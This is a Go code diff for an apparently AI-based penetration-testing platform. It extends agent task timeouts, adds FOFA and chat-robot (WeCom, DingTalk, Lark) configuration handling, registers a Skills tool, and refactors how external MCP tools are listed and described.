@@ -1140,11 +1444,13 @@ func (h *AgentHandler) executeBatchQueue(queueID string) {
// 执行任务(使用包含角色提示词的finalMessage和角色工具列表)
h.logger.Info("执行批量任务", zap.String("queueId", queueID), zap.String("taskId", task.ID), zap.String("message", task.Message), zap.String("role", queue.Role), zap.String("conversationId", conversationID))
ctx, cancel := context.WithTimeout(context.Background(), 30*time.Minute)
// 单个子任务超时时间:从30分钟调整为6小时,适配长时间渗透/扫描任务
ctx, cancel := context.WithTimeout(context.Background(), 6*time.Hour)
// 存储取消函数,以便在取消队列时能够取消当前任务
h.batchTaskManager.SetTaskCancel(queueID, cancel)
// 使用队列配置的角色工具列表(如果为空,表示使用所有工具)
result, err := h.agent.AgentLoopWithProgress(ctx, finalMessage, []agent.ChatMessage{}, conversationID, progressCallback, roleTools)
// 注意:skills不会硬编码注入,但会在系统提示词中提示AI这个角色推荐使用哪些skills
result, err := h.agent.AgentLoopWithProgress(ctx, finalMessage, []agent.ChatMessage{}, conversationID, progressCallback, roleTools, roleSkills)
// 任务执行完成,清理取消函数
h.batchTaskManager.SetTaskCancel(queueID, nil)
cancel()
+261 -167
View File
@@ -28,6 +28,9 @@ type KnowledgeToolRegistrar func() error
// VulnerabilityToolRegistrar 漏洞工具注册器接口
type VulnerabilityToolRegistrar func() error
// SkillsToolRegistrar Skills工具注册器接口
type SkillsToolRegistrar func() error
// RetrieverUpdater 检索器更新接口
type RetrieverUpdater interface {
UpdateConfig(config *knowledge.RetrievalConfig)
@@ -41,6 +44,11 @@ type AppUpdater interface {
UpdateKnowledgeComponents(handler *KnowledgeHandler, manager interface{}, retriever interface{}, indexer interface{})
}
// RobotRestarter 机器人连接重启器(用于配置应用后重启钉钉/飞书长连接)
type RobotRestarter interface {
RestartRobotConnections()
}
// ConfigHandler 配置处理器
type ConfigHandler struct {
configPath string
@@ -52,9 +60,11 @@ type ConfigHandler struct {
externalMCPMgr *mcp.ExternalMCPManager // 外部MCP管理器
knowledgeToolRegistrar KnowledgeToolRegistrar // 知识库工具注册器(可选)
vulnerabilityToolRegistrar VulnerabilityToolRegistrar // 漏洞工具注册器(可选)
skillsToolRegistrar SkillsToolRegistrar // Skills工具注册器(可选)
retrieverUpdater RetrieverUpdater // 检索器更新器(可选)
knowledgeInitializer KnowledgeInitializer // 知识库初始化器(可选)
appUpdater AppUpdater // App更新器(可选)
robotRestarter RobotRestarter // 机器人连接重启器(可选),ApplyConfig 时重启钉钉/飞书
logger *zap.Logger
mu sync.RWMutex
lastEmbeddingConfig *config.EmbeddingConfig // 上一次的嵌入模型配置(用于检测变更)
@@ -110,6 +120,13 @@ func (h *ConfigHandler) SetVulnerabilityToolRegistrar(registrar VulnerabilityToo
h.vulnerabilityToolRegistrar = registrar
}
// SetSkillsToolRegistrar 设置Skills工具注册器
func (h *ConfigHandler) SetSkillsToolRegistrar(registrar SkillsToolRegistrar) {
h.mu.Lock()
defer h.mu.Unlock()
h.skillsToolRegistrar = registrar
}
// SetRetrieverUpdater 设置检索器更新器
func (h *ConfigHandler) SetRetrieverUpdater(updater RetrieverUpdater) {
h.mu.Lock()
@@ -131,13 +148,22 @@ func (h *ConfigHandler) SetAppUpdater(updater AppUpdater) {
h.appUpdater = updater
}
// SetRobotRestarter 设置机器人连接重启器(ApplyConfig 时用于重启钉钉/飞书长连接)
func (h *ConfigHandler) SetRobotRestarter(restarter RobotRestarter) {
h.mu.Lock()
defer h.mu.Unlock()
h.robotRestarter = restarter
}
// GetConfigResponse 获取配置响应
type GetConfigResponse struct {
OpenAI config.OpenAIConfig `json:"openai"`
FOFA config.FofaConfig `json:"fofa"`
MCP config.MCPConfig `json:"mcp"`
Tools []ToolConfigInfo `json:"tools"`
Agent config.AgentConfig `json:"agent"`
Knowledge config.KnowledgeConfig `json:"knowledge"`
Robots config.RobotsConfig `json:"robots,omitempty"`
}
// ToolConfigInfo 工具配置信息
@@ -163,18 +189,10 @@ func (h *ConfigHandler) GetConfig(c *gin.Context) {
configToolMap[tool.Name] = true
tools = append(tools, ToolConfigInfo{
Name: tool.Name,
Description: tool.ShortDescription,
Description: h.pickToolDescription(tool.ShortDescription, tool.Description),
Enabled: tool.Enabled,
IsExternal: false,
})
// 如果没有简短描述,使用详细描述的前100个字符
if tools[len(tools)-1].Description == "" {
desc := tool.Description
if len(desc) > 100 {
desc = desc[:100] + "..."
}
tools[len(tools)-1].Description = desc
}
}
// 从MCP服务器获取所有已注册的工具(包括直接注册的工具,如知识检索工具)
@@ -190,8 +208,8 @@ func (h *ConfigHandler) GetConfig(c *gin.Context) {
if description == "" {
description = mcpTool.Description
}
if len(description) > 100 {
description = description[:100] + "..."
if len(description) > 10000 {
description = description[:10000] + "..."
}
tools = append(tools, ToolConfigInfo{
Name: mcpTool.Name,
@@ -204,70 +222,21 @@ func (h *ConfigHandler) GetConfig(c *gin.Context) {
// 获取外部MCP工具
if h.externalMCPMgr != nil {
// 增加超时时间到30秒,因为通过代理连接远程服务器可能需要更长时间
ctx, cancel := context.WithTimeout(context.Background(), 30*time.Second)
defer cancel()
externalTools, err := h.externalMCPMgr.GetAllTools(ctx)
if err == nil {
externalMCPConfigs := h.externalMCPMgr.GetConfigs()
for _, externalTool := range externalTools {
var mcpName, actualToolName string
if idx := strings.Index(externalTool.Name, "::"); idx > 0 {
mcpName = externalTool.Name[:idx]
actualToolName = externalTool.Name[idx+2:]
} else {
continue
}
enabled := false
if cfg, exists := externalMCPConfigs[mcpName]; exists {
// 首先检查外部MCP是否启用
if !cfg.ExternalMCPEnable && !(cfg.Enabled && !cfg.Disabled) {
enabled = false // MCP未启用,所有工具都禁用
} else {
// MCP已启用,检查单个工具的启用状态
// 如果ToolEnabled为空或未设置该工具,默认为启用(向后兼容)
if cfg.ToolEnabled == nil {
enabled = true // 未设置工具状态,默认为启用
} else if toolEnabled, exists := cfg.ToolEnabled[actualToolName]; exists {
enabled = toolEnabled // 使用配置的工具状态
} else {
enabled = true // 工具未在配置中,默认为启用
}
}
}
client, exists := h.externalMCPMgr.GetClient(mcpName)
if !exists || !client.IsConnected() {
enabled = false
}
description := externalTool.ShortDescription
if description == "" {
description = externalTool.Description
}
if len(description) > 100 {
description = description[:100] + "..."
}
tools = append(tools, ToolConfigInfo{
Name: actualToolName,
Description: description,
Enabled: enabled,
IsExternal: true,
ExternalMCP: mcpName,
})
}
ctx := context.Background()
externalTools := h.getExternalMCPTools(ctx)
for _, toolInfo := range externalTools {
tools = append(tools, toolInfo)
}
}
c.JSON(http.StatusOK, GetConfigResponse{
OpenAI: h.config.OpenAI,
FOFA: h.config.FOFA,
MCP: h.config.MCP,
Tools: tools,
Agent: h.config.Agent,
Knowledge: h.config.Knowledge,
Robots: h.config.Robots,
})
}
@@ -331,18 +300,10 @@ func (h *ConfigHandler) GetTools(c *gin.Context) {
configToolMap[tool.Name] = true
toolInfo := ToolConfigInfo{
Name: tool.Name,
Description: tool.ShortDescription,
Description: h.pickToolDescription(tool.ShortDescription, tool.Description),
Enabled: tool.Enabled,
IsExternal: false,
}
// 如果没有简短描述,使用详细描述的前100个字符
if toolInfo.Description == "" {
desc := tool.Description
if len(desc) > 100 {
desc = desc[:100] + "..."
}
toolInfo.Description = desc
}
// 根据角色配置标注工具状态
if roleName != "" {
@@ -394,8 +355,8 @@ func (h *ConfigHandler) GetTools(c *gin.Context) {
if description == "" {
description = mcpTool.Description
}
if len(description) > 100 {
description = description[:100] + "..."
if len(description) > 10000 {
description = description[:10000] + "..."
}
toolInfo := ToolConfigInfo{
@@ -440,99 +401,43 @@ func (h *ConfigHandler) GetTools(c *gin.Context) {
// 获取外部MCP工具
if h.externalMCPMgr != nil {
// 增加超时时间到30秒,因为通过代理连接远程服务器可能需要更长时间
ctx, cancel := context.WithTimeout(context.Background(), 30*time.Second)
defer cancel()
// 创建context用于获取外部工具
ctx := context.Background()
externalTools := h.getExternalMCPTools(ctx)
externalTools, err := h.externalMCPMgr.GetAllTools(ctx)
if err != nil {
h.logger.Warn("获取外部MCP工具失败", zap.Error(err))
} else {
// 获取外部MCP配置,用于判断启用状态
externalMCPConfigs := h.externalMCPMgr.GetConfigs()
for _, externalTool := range externalTools {
// 解析工具名称:mcpName::toolName
var mcpName, actualToolName string
if idx := strings.Index(externalTool.Name, "::"); idx > 0 {
mcpName = externalTool.Name[:idx]
actualToolName = externalTool.Name[idx+2:]
} else {
continue // 跳过格式不正确的工具
// 应用搜索过滤和角色配置
for _, toolInfo := range externalTools {
// 搜索过滤
if searchTermLower != "" {
nameLower := strings.ToLower(toolInfo.Name)
descLower := strings.ToLower(toolInfo.Description)
if !strings.Contains(nameLower, searchTermLower) && !strings.Contains(descLower, searchTermLower) {
continue // 不匹配,跳过
}
// 获取外部工具的启用状态
enabled := false
if cfg, exists := externalMCPConfigs[mcpName]; exists {
// 首先检查外部MCP是否启用
if !cfg.ExternalMCPEnable && !(cfg.Enabled && !cfg.Disabled) {
enabled = false // MCP未启用,所有工具都禁用
} else {
// MCP已启用,检查单个工具的启用状态
// 如果ToolEnabled为空或未设置该工具,默认为启用(向后兼容)
if cfg.ToolEnabled == nil {
enabled = true // 未设置工具状态,默认为启用
} else if toolEnabled, exists := cfg.ToolEnabled[actualToolName]; exists {
enabled = toolEnabled // 使用配置的工具状态
} else {
enabled = true // 工具未在配置中,默认为启用
}
}
}
// 检查外部MCP是否已连接
client, exists := h.externalMCPMgr.GetClient(mcpName)
if !exists || !client.IsConnected() {
enabled = false // 未连接时视为禁用
}
description := externalTool.ShortDescription
if description == "" {
description = externalTool.Description
}
if len(description) > 100 {
description = description[:100] + "..."
}
// 如果有关键词,进行搜索过滤
if searchTermLower != "" {
nameLower := strings.ToLower(actualToolName)
descLower := strings.ToLower(description)
if !strings.Contains(nameLower, searchTermLower) && !strings.Contains(descLower, searchTermLower) {
continue // 不匹配,跳过
}
}
toolInfo := ToolConfigInfo{
Name: actualToolName, // 显示实际工具名称,不带前缀
Description: description,
Enabled: enabled,
IsExternal: true,
ExternalMCP: mcpName,
}
// 根据角色配置标注工具状态
if roleName != "" {
if roleUsesAllTools {
// 角色使用所有工具,标注启用的工具为role_enabled=true
toolInfo.RoleEnabled = &enabled
} else {
// 角色配置了工具列表,检查工具是否在列表中
// 外部工具使用 "mcpName::toolName" 格式作为key
externalToolKey := externalTool.Name // 这是 "mcpName::toolName" 格式
if roleToolsSet[externalToolKey] {
roleEnabled := enabled // 工具必须在角色列表中且本身启用
toolInfo.RoleEnabled = &roleEnabled
} else {
// 不在角色列表中,标记为false
roleEnabled := false
toolInfo.RoleEnabled = &roleEnabled
}
}
}
allTools = append(allTools, toolInfo)
}
// 根据角色配置标注工具状态
if roleName != "" {
if roleUsesAllTools {
// 角色使用所有工具,标注启用的工具为role_enabled=true
roleEnabled := toolInfo.Enabled
toolInfo.RoleEnabled = &roleEnabled
} else {
// 角色配置了工具列表,检查工具是否在列表中
// 外部工具使用 "mcpName::toolName" 格式作为key
externalToolKey := fmt.Sprintf("%s::%s", toolInfo.ExternalMCP, toolInfo.Name)
if roleToolsSet[externalToolKey] {
roleEnabled := toolInfo.Enabled // 工具必须在角色列表中且本身启用
toolInfo.RoleEnabled = &roleEnabled
} else {
// 不在角色列表中,标记为false
roleEnabled := false
toolInfo.RoleEnabled = &roleEnabled
}
}
}
allTools = append(allTools, toolInfo)
}
}
@@ -584,10 +489,12 @@ func (h *ConfigHandler) GetTools(c *gin.Context) {
// UpdateConfigRequest 更新配置请求
type UpdateConfigRequest struct {
OpenAI *config.OpenAIConfig `json:"openai,omitempty"`
FOFA *config.FofaConfig `json:"fofa,omitempty"`
MCP *config.MCPConfig `json:"mcp,omitempty"`
Tools []ToolEnableStatus `json:"tools,omitempty"`
Agent *config.AgentConfig `json:"agent,omitempty"`
Knowledge *config.KnowledgeConfig `json:"knowledge,omitempty"`
Robots *config.RobotsConfig `json:"robots,omitempty"`
}
// ToolEnableStatus 工具启用状态
@@ -618,6 +525,12 @@ func (h *ConfigHandler) UpdateConfig(c *gin.Context) {
)
}
// 更新FOFA配置
if req.FOFA != nil {
h.config.FOFA = *req.FOFA
h.logger.Info("更新FOFA配置", zap.String("email", h.config.FOFA.Email))
}
// 更新MCP配置
if req.MCP != nil {
h.config.MCP = *req.MCP
@@ -658,6 +571,16 @@ func (h *ConfigHandler) UpdateConfig(c *gin.Context) {
)
}
// 更新机器人配置
if req.Robots != nil {
h.config.Robots = *req.Robots
h.logger.Info("更新机器人配置",
zap.Bool("wecom_enabled", h.config.Robots.Wecom.Enabled),
zap.Bool("dingtalk_enabled", h.config.Robots.Dingtalk.Enabled),
zap.Bool("lark_enabled", h.config.Robots.Lark.Enabled),
)
}
// 更新工具启用状态
if req.Tools != nil {
// 分离内部工具和外部工具
@@ -869,6 +792,16 @@ func (h *ConfigHandler) ApplyConfig(c *gin.Context) {
}
}
// 重新注册Skills工具(内置工具,必须注册)
if h.skillsToolRegistrar != nil {
h.logger.Info("重新注册Skills工具")
if err := h.skillsToolRegistrar(); err != nil {
h.logger.Error("重新注册Skills工具失败", zap.Error(err))
} else {
h.logger.Info("Skills工具已重新注册")
}
}
// 如果知识库启用,重新注册知识库工具
if h.config.Knowledge.Enabled && h.knowledgeToolRegistrar != nil {
h.logger.Info("重新注册知识库工具")
@@ -917,6 +850,12 @@ func (h *ConfigHandler) ApplyConfig(c *gin.Context) {
}
}
// 重启钉钉/飞书长连接,使前端修改的机器人配置立即生效(无需重启服务)
if h.robotRestarter != nil {
h.robotRestarter.RestartRobotConnections()
h.logger.Info("已触发机器人连接重启(钉钉/飞书)")
}
h.logger.Info("配置已应用",
zap.Int("tools_count", len(h.config.Security.Tools)),
)
@@ -947,7 +886,9 @@ func (h *ConfigHandler) saveConfig() error {
updateAgentConfig(root, h.config.Agent.MaxIterations)
updateMCPConfig(root, h.config.MCP)
updateOpenAIConfig(root, h.config.OpenAI)
updateFOFAConfig(root, h.config.FOFA)
updateKnowledgeConfig(root, h.config.Knowledge)
updateRobotsConfig(root, h.config.Robots)
// 更新外部MCP配置(使用external_mcp.go中的函数,同一包中可直接调用)
// 读取原始配置以保持向后兼容
originalConfigs := make(map[string]map[string]bool)
@@ -1091,6 +1032,14 @@ func updateOpenAIConfig(doc *yaml.Node, cfg config.OpenAIConfig) {
setStringInMap(openaiNode, "model", cfg.Model)
}
func updateFOFAConfig(doc *yaml.Node, cfg config.FofaConfig) {
root := doc.Content[0]
fofaNode := ensureMap(root, "fofa")
setStringInMap(fofaNode, "base_url", cfg.BaseURL)
setStringInMap(fofaNode, "email", cfg.Email)
setStringInMap(fofaNode, "api_key", cfg.APIKey)
}
func updateKnowledgeConfig(doc *yaml.Node, cfg config.KnowledgeConfig) {
root := doc.Content[0]
knowledgeNode := ensureMap(root, "knowledge")
@@ -1113,6 +1062,40 @@ func updateKnowledgeConfig(doc *yaml.Node, cfg config.KnowledgeConfig) {
setIntInMap(retrievalNode, "top_k", cfg.Retrieval.TopK)
setFloatInMap(retrievalNode, "similarity_threshold", cfg.Retrieval.SimilarityThreshold)
setFloatInMap(retrievalNode, "hybrid_weight", cfg.Retrieval.HybridWeight)
// 更新索引配置
indexingNode := ensureMap(knowledgeNode, "indexing")
setIntInMap(indexingNode, "chunk_size", cfg.Indexing.ChunkSize)
setIntInMap(indexingNode, "chunk_overlap", cfg.Indexing.ChunkOverlap)
setIntInMap(indexingNode, "max_chunks_per_item", cfg.Indexing.MaxChunksPerItem)
setIntInMap(indexingNode, "max_rpm", cfg.Indexing.MaxRPM)
setIntInMap(indexingNode, "rate_limit_delay_ms", cfg.Indexing.RateLimitDelayMs)
setIntInMap(indexingNode, "max_retries", cfg.Indexing.MaxRetries)
setIntInMap(indexingNode, "retry_delay_ms", cfg.Indexing.RetryDelayMs)
}
func updateRobotsConfig(doc *yaml.Node, cfg config.RobotsConfig) {
root := doc.Content[0]
robotsNode := ensureMap(root, "robots")
wecomNode := ensureMap(robotsNode, "wecom")
setBoolInMap(wecomNode, "enabled", cfg.Wecom.Enabled)
setStringInMap(wecomNode, "token", cfg.Wecom.Token)
setStringInMap(wecomNode, "encoding_aes_key", cfg.Wecom.EncodingAESKey)
setStringInMap(wecomNode, "corp_id", cfg.Wecom.CorpID)
setStringInMap(wecomNode, "secret", cfg.Wecom.Secret)
setIntInMap(wecomNode, "agent_id", int(cfg.Wecom.AgentID))
dingtalkNode := ensureMap(robotsNode, "dingtalk")
setBoolInMap(dingtalkNode, "enabled", cfg.Dingtalk.Enabled)
setStringInMap(dingtalkNode, "client_id", cfg.Dingtalk.ClientID)
setStringInMap(dingtalkNode, "client_secret", cfg.Dingtalk.ClientSecret)
larkNode := ensureMap(robotsNode, "lark")
setBoolInMap(larkNode, "enabled", cfg.Lark.Enabled)
setStringInMap(larkNode, "app_id", cfg.Lark.AppID)
setStringInMap(larkNode, "app_secret", cfg.Lark.AppSecret)
setStringInMap(larkNode, "verify_token", cfg.Lark.VerifyToken)
}
func ensureMap(parent *yaml.Node, path ...string) *yaml.Node {
@@ -1238,3 +1221,114 @@ func setFloatInMap(mapNode *yaml.Node, key string, value float64) {
valueNode.Value = fmt.Sprintf("%g", value)
}
}
// getExternalMCPTools 获取外部MCP工具列表(公共方法)
// 返回 ToolConfigInfo 列表,已处理启用状态和描述信息
func (h *ConfigHandler) getExternalMCPTools(ctx context.Context) []ToolConfigInfo {
var result []ToolConfigInfo
if h.externalMCPMgr == nil {
return result
}
// 使用较短的超时时间(5秒)进行快速失败,避免阻塞页面加载
timeoutCtx, cancel := context.WithTimeout(ctx, 5*time.Second)
defer cancel()
externalTools, err := h.externalMCPMgr.GetAllTools(timeoutCtx)
if err != nil {
// 记录警告但不阻塞,继续返回已缓存的工具(如果有)
h.logger.Warn("获取外部MCP工具失败(可能连接断开),尝试返回缓存的工具",
zap.Error(err),
zap.String("hint", "如果外部MCP工具未显示,请检查连接状态或点击刷新按钮"),
)
}
// 如果获取到了工具(即使有错误),继续处理
if len(externalTools) == 0 {
return result
}
externalMCPConfigs := h.externalMCPMgr.GetConfigs()
for _, externalTool := range externalTools {
// 解析工具名称:mcpName::toolName
mcpName, actualToolName := h.parseExternalToolName(externalTool.Name)
if mcpName == "" || actualToolName == "" {
continue // 跳过格式不正确的工具
}
// 计算启用状态
enabled := h.calculateExternalToolEnabled(mcpName, actualToolName, externalMCPConfigs)
// 处理描述信息
description := h.pickToolDescription(externalTool.ShortDescription, externalTool.Description)
result = append(result, ToolConfigInfo{
Name: actualToolName,
Description: description,
Enabled: enabled,
IsExternal: true,
ExternalMCP: mcpName,
})
}
return result
}
// parseExternalToolName 解析外部工具名称(格式:mcpName::toolName
func (h *ConfigHandler) parseExternalToolName(fullName string) (mcpName, toolName string) {
idx := strings.Index(fullName, "::")
if idx > 0 {
return fullName[:idx], fullName[idx+2:]
}
return "", ""
}
// calculateExternalToolEnabled 计算外部工具的启用状态
func (h *ConfigHandler) calculateExternalToolEnabled(mcpName, toolName string, configs map[string]config.ExternalMCPServerConfig) bool {
cfg, exists := configs[mcpName]
if !exists {
return false
}
// 首先检查外部MCP是否启用
if !cfg.ExternalMCPEnable && !(cfg.Enabled && !cfg.Disabled) {
return false // MCP未启用,所有工具都禁用
}
// MCP已启用,检查单个工具的启用状态
// 如果ToolEnabled为空或未设置该工具,默认为启用(向后兼容)
if cfg.ToolEnabled == nil {
// 未设置工具状态,默认为启用
} else if toolEnabled, exists := cfg.ToolEnabled[toolName]; exists {
// 使用配置的工具状态
if !toolEnabled {
return false
}
}
// 工具未在配置中,默认为启用
// 最后检查外部MCP是否已连接
client, exists := h.externalMCPMgr.GetClient(mcpName)
if !exists || !client.IsConnected() {
return false // 未连接时视为禁用
}
return true
}
// pickToolDescription 根据 security.tool_description_mode 选择 short 或 full 描述并限制长度
func (h *ConfigHandler) pickToolDescription(shortDesc, fullDesc string) string {
useFull := strings.TrimSpace(strings.ToLower(h.config.Security.ToolDescriptionMode)) == "full"
description := shortDesc
if useFull {
description = fullDesc
} else if description == "" {
description = fullDesc
}
if len(description) > 10000 {
description = description[:10000] + "..."
}
return description
}
+56 -49
View File
@@ -8,6 +8,7 @@ import (
"cyberstrike-ai/internal/config"
"cyberstrike-ai/internal/mcp"
"github.com/gin-gonic/gin"
"go.uber.org/zap"
"gopkg.in/yaml.v3"
@@ -36,12 +37,12 @@ func NewExternalMCPHandler(manager *mcp.ExternalMCPManager, cfg *config.Config,
func (h *ExternalMCPHandler) GetExternalMCPs(c *gin.Context) {
h.mu.RLock()
defer h.mu.RUnlock()
configs := h.manager.GetConfigs()
// 获取所有外部MCP的工具数量
toolCounts := h.manager.GetToolCounts()
// 转换为响应格式
result := make(map[string]ExternalMCPResponse)
for name, cfg := range configs {
@@ -54,13 +55,13 @@ func (h *ExternalMCPHandler) GetExternalMCPs(c *gin.Context) {
} else {
status = "disabled"
}
toolCount := toolCounts[name]
errorMsg := ""
if status == "error" {
errorMsg = h.manager.GetError(name)
}
result[name] = ExternalMCPResponse{
Config: cfg,
Status: status,
@@ -68,7 +69,7 @@ func (h *ExternalMCPHandler) GetExternalMCPs(c *gin.Context) {
Error: errorMsg,
}
}
c.JSON(http.StatusOK, gin.H{
"servers": result,
"stats": h.manager.GetStats(),
@@ -78,17 +79,17 @@ func (h *ExternalMCPHandler) GetExternalMCPs(c *gin.Context) {
// GetExternalMCP 获取单个外部MCP配置
func (h *ExternalMCPHandler) GetExternalMCP(c *gin.Context) {
name := c.Param("name")
h.mu.RLock()
defer h.mu.RUnlock()
configs := h.manager.GetConfigs()
cfg, exists := configs[name]
if !exists {
c.JSON(http.StatusNotFound, gin.H{"error": "外部MCP配置不存在"})
return
}
client, clientExists := h.manager.GetClient(name)
status := "disconnected"
if clientExists {
@@ -98,7 +99,7 @@ func (h *ExternalMCPHandler) GetExternalMCP(c *gin.Context) {
} else {
status = "disabled"
}
// 获取工具数量
toolCount := 0
if clientExists && client.IsConnected() {
@@ -106,13 +107,13 @@ func (h *ExternalMCPHandler) GetExternalMCP(c *gin.Context) {
toolCount = count
}
}
// 获取错误信息
errorMsg := ""
if status == "error" {
errorMsg = h.manager.GetError(name)
}
c.JSON(http.StatusOK, ExternalMCPResponse{
Config: cfg,
Status: status,
@@ -128,38 +129,38 @@ func (h *ExternalMCPHandler) AddOrUpdateExternalMCP(c *gin.Context) {
c.JSON(http.StatusBadRequest, gin.H{"error": "无效的请求参数: " + err.Error()})
return
}
name := c.Param("name")
if name == "" {
c.JSON(http.StatusBadRequest, gin.H{"error": "名称不能为空"})
return
}
// 验证配置
if err := h.validateConfig(req.Config); err != nil {
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
return
}
h.mu.Lock()
defer h.mu.Unlock()
// 添加或更新配置
if err := h.manager.AddOrUpdateConfig(name, req.Config); err != nil {
h.logger.Error("添加或更新外部MCP配置失败", zap.Error(err))
c.JSON(http.StatusInternalServerError, gin.H{"error": "添加或更新配置失败: " + err.Error()})
return
}
// 更新内存中的配置
if h.config.ExternalMCP.Servers == nil {
h.config.ExternalMCP.Servers = make(map[string]config.ExternalMCPServerConfig)
}
// 如果用户提供了 disabled 或 enabled 字段,保留它们以保持向后兼容
// 同时将值迁移到 external_mcp_enable
cfg := req.Config
if req.Config.Disabled {
// 用户设置了 disabled: true
cfg.ExternalMCPEnable = false
@@ -185,16 +186,16 @@ func (h *ExternalMCPHandler) AddOrUpdateExternalMCP(c *gin.Context) {
cfg.Enabled = true
cfg.Disabled = false
}
h.config.ExternalMCP.Servers[name] = cfg
// 保存到配置文件
if err := h.saveConfig(); err != nil {
h.logger.Error("保存配置失败", zap.Error(err))
c.JSON(http.StatusInternalServerError, gin.H{"error": "保存配置失败: " + err.Error()})
return
}
h.logger.Info("外部MCP配置已更新", zap.String("name", name))
c.JSON(http.StatusOK, gin.H{"message": "配置已更新"})
}
@@ -202,28 +203,28 @@ func (h *ExternalMCPHandler) AddOrUpdateExternalMCP(c *gin.Context) {
// DeleteExternalMCP 删除外部MCP配置
func (h *ExternalMCPHandler) DeleteExternalMCP(c *gin.Context) {
name := c.Param("name")
h.mu.Lock()
defer h.mu.Unlock()
// 移除配置
if err := h.manager.RemoveConfig(name); err != nil {
c.JSON(http.StatusNotFound, gin.H{"error": "配置不存在"})
return
}
// 从内存配置中删除
if h.config.ExternalMCP.Servers != nil {
delete(h.config.ExternalMCP.Servers, name)
}
// 保存到配置文件
if err := h.saveConfig(); err != nil {
h.logger.Error("保存配置失败", zap.Error(err))
c.JSON(http.StatusInternalServerError, gin.H{"error": "保存配置失败: " + err.Error()})
return
}
h.logger.Info("外部MCP配置已删除", zap.String("name", name))
c.JSON(http.StatusOK, gin.H{"message": "配置已删除"})
}
@@ -231,10 +232,10 @@ func (h *ExternalMCPHandler) DeleteExternalMCP(c *gin.Context) {
// StartExternalMCP 启动外部MCP
func (h *ExternalMCPHandler) StartExternalMCP(c *gin.Context) {
name := c.Param("name")
h.mu.Lock()
defer h.mu.Unlock()
// 更新配置为启用
if h.config.ExternalMCP.Servers == nil {
h.config.ExternalMCP.Servers = make(map[string]config.ExternalMCPServerConfig)
@@ -242,32 +243,32 @@ func (h *ExternalMCPHandler) StartExternalMCP(c *gin.Context) {
cfg := h.config.ExternalMCP.Servers[name]
cfg.ExternalMCPEnable = true
h.config.ExternalMCP.Servers[name] = cfg
// 保存到配置文件
if err := h.saveConfig(); err != nil {
h.logger.Error("保存配置失败", zap.Error(err))
c.JSON(http.StatusInternalServerError, gin.H{"error": "保存配置失败: " + err.Error()})
return
}
// 启动客户端(立即创建客户端并设置状态为connecting,实际连接在后台进行)
h.logger.Info("开始启动外部MCP", zap.String("name", name))
if err := h.manager.StartClient(name); err != nil {
h.logger.Error("启动外部MCP失败", zap.String("name", name), zap.Error(err))
c.JSON(http.StatusBadRequest, gin.H{
"error": err.Error(),
"error": err.Error(),
"status": "error",
})
return
}
// 获取客户端状态(应该是connecting)
client, exists := h.manager.GetClient(name)
status := "connecting"
if exists {
status = client.GetStatus()
}
// 立即返回,不等待连接完成
// 客户端会在后台异步连接,用户可以通过状态查询接口查看连接状态
c.JSON(http.StatusOK, gin.H{
@@ -279,16 +280,16 @@ func (h *ExternalMCPHandler) StartExternalMCP(c *gin.Context) {
// StopExternalMCP 停止外部MCP
func (h *ExternalMCPHandler) StopExternalMCP(c *gin.Context) {
name := c.Param("name")
h.mu.Lock()
defer h.mu.Unlock()
// 停止客户端
if err := h.manager.StopClient(name); err != nil {
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
return
}
// 更新配置
if h.config.ExternalMCP.Servers == nil {
h.config.ExternalMCP.Servers = make(map[string]config.ExternalMCPServerConfig)
@@ -296,14 +297,14 @@ func (h *ExternalMCPHandler) StopExternalMCP(c *gin.Context) {
cfg := h.config.ExternalMCP.Servers[name]
cfg.ExternalMCPEnable = false
h.config.ExternalMCP.Servers[name] = cfg
// 保存到配置文件
if err := h.saveConfig(); err != nil {
h.logger.Error("保存配置失败", zap.Error(err))
c.JSON(http.StatusInternalServerError, gin.H{"error": "保存配置失败: " + err.Error()})
return
}
h.logger.Info("外部MCP已停止", zap.String("name", name))
c.JSON(http.StatusOK, gin.H{"message": "外部MCP已停止"})
}
@@ -327,7 +328,7 @@ func (h *ExternalMCPHandler) validateConfig(cfg config.ExternalMCPServerConfig)
return fmt.Errorf("需要指定commandstdio模式)或urlhttp/sse模式)")
}
}
switch transport {
case "http":
if cfg.URL == "" {
@@ -344,7 +345,7 @@ func (h *ExternalMCPHandler) validateConfig(cfg config.ExternalMCPServerConfig)
default:
return fmt.Errorf("不支持的传输模式: %s,支持的模式: http, stdio, sse", transport)
}
return nil
}
@@ -428,17 +429,17 @@ func updateExternalMCPConfig(doc *yaml.Node, cfg config.ExternalMCPConfig, origi
root := doc.Content[0]
externalMCPNode := ensureMap(root, "external_mcp")
serversNode := ensureMap(externalMCPNode, "servers")
// 清空现有服务器配置
serversNode.Content = nil
// 添加新的服务器配置
for name, serverCfg := range cfg.Servers {
// 添加服务器名称键
nameNode := &yaml.Node{Kind: yaml.ScalarNode, Tag: "!!str", Value: name}
serverNode := &yaml.Node{Kind: yaml.MappingNode, Tag: "!!map"}
serversNode.Content = append(serversNode.Content, nameNode, serverNode)
// 设置服务器配置字段
if serverCfg.Command != "" {
setStringInMap(serverNode, "command", serverCfg.Command)
@@ -459,6 +460,13 @@ func updateExternalMCPConfig(doc *yaml.Node, cfg config.ExternalMCPConfig, origi
if serverCfg.URL != "" {
setStringInMap(serverNode, "url", serverCfg.URL)
}
// 保存 headers 字段(HTTP/SSE 请求头)
if serverCfg.Headers != nil && len(serverCfg.Headers) > 0 {
headersNode := ensureMap(serverNode, "headers")
for k, v := range serverCfg.Headers {
setStringInMap(headersNode, k, v)
}
}
if serverCfg.Description != "" {
setStringInMap(serverNode, "description", serverCfg.Description)
}
@@ -476,7 +484,7 @@ func updateExternalMCPConfig(doc *yaml.Node, cfg config.ExternalMCPConfig, origi
}
// 保留旧的 enabled/disabled 字段以保持向后兼容
originalFields, hasOriginal := originalConfigs[name]
// 如果原始配置中有 enabled 字段,保留它
if hasOriginal {
if enabledVal, hasEnabled := originalFields["enabled"]; hasEnabled {
@@ -494,7 +502,7 @@ func updateExternalMCPConfig(doc *yaml.Node, cfg config.ExternalMCPConfig, origi
}
}
}
// 如果用户在当前请求中明确设置了这些字段,也保存它们
if serverCfg.Enabled {
setBoolInMap(serverNode, "enabled", serverCfg.Enabled)
@@ -528,8 +536,7 @@ type AddOrUpdateExternalMCPRequest struct {
// ExternalMCPResponse 外部MCP响应
type ExternalMCPResponse struct {
Config config.ExternalMCPServerConfig `json:"config"`
Status string `json:"status"` // "connected", "disconnected", "disabled", "error", "connecting"
ToolCount int `json:"tool_count"` // 工具数量
